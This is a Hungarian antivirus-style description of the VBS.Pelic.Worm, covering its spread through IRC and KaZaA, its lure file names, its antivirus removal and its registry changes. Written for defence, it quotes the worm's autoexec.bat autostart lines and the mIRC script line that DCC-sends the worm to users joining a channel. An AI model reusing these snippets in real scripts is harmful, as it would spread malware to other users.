VBS.Pelic.Worm – IRC-n terjedő féregvírus

A féreg paraméterei

Felfedezésének ideje: 2002. október 1.
Védekezés elkészültének ideje: 2002. október 3.
Veszélyeztetett operációs rendszerek: Windows 9x/NT/2k/XP/Me
Nem érintett operációs rendszerek: Windows 3.x, Macintosh, Unix, Linux
Mérete: 7.915 byte
Fertőzések száma: 0-49
Földrajzi elterjedtsége: alacsony
Károkozás mértéke: alacsony
Eltávolítása: könnyű

Aktiválódása esetén lezajló események

– egy IRC-csatornához való csatlakozáskor a következő üzenetet jeleníti meg: hola , soy francisco , quieres tener todas las peliculas que quieras ver!
– ezek után létrehozza a C:/Windows/All_acces_videos.exe.vbs állományt
– bemásolja magát a következő helyekre:
C:/Windows/autoexec.bat.vbs
C:/Program Files/KaZaA/My Shared Folder/Sex-free.exe.vbs
C:/ARCHIV~1/KaZaA/My Shared Folder/Windows-xp-full-edition.exe.vbs
C:/ARCHIV~1/KaZaA/My Shared Folder/Shakira-sex-anal.jpg.vbs
C:/Program Files/KaZaA/My Shared Folder/Mix-brazil.mp3.vbs
C:/ARCHIV~1/KaZaA/My Shared Folder/Porto-seguro.mp3.vbs
C:/ARCHIV~1/KaZaA/My Shared Folder/Asereje.mp3.vbs
C:/ARCHIV~1/KaZaA/My Shared Folder/Quake 2.exe.vbs
C:/ARCHIV~1/KaZaA/My Shared Folder/Half-life_complete_version.zip.vbs
C:/Windows/Quake2.exe.vbs
C:/Windows/all_acces_videos.exe.vbs
C:/Windows/kazaa/all_acces_videos.exe.vbs
C:/Windows/kazaa/sex_all.exe.vbs
C:/Windows/kazaa/quake2_full_version.exe.vbs
– főbb antivírus programok után kutat és megkísérli letörölni, ha talál egyet
– módosítja az autoexec.bat file-t a következő két sor hozzáadásával:
@Start C:/windows/Quake2.exe.vbs>nul
cls
– a C, D, E meghajtón mIRC scriptek után keres, és ha talál akkor abban a következő változtatást végzi:
[script]
n0=on 1:JOIN:#:if ( $me != $nick ) { /msg $Nick hola , soy francisco , quieres tener todas las peliculas que quieras ver! | /dcc send $NICK C:/Windows/all_acces_videos.exe.vbs }
– létrehozza a HKEY_CURRENT_USER/software/Legion/sistem Registry kulcsot, illetve ebben az infected értéket
– amennyiben ez az érték be van állítva, a féreg felülírja a HTML, HTT, HTM állományokat saját kódjával
– a HKEY_CURRENT_USER/Software/Kazaa/LocalContent/DisableSharing Registry kulcsot is megváltoztatja, mégpedig 00000000-ra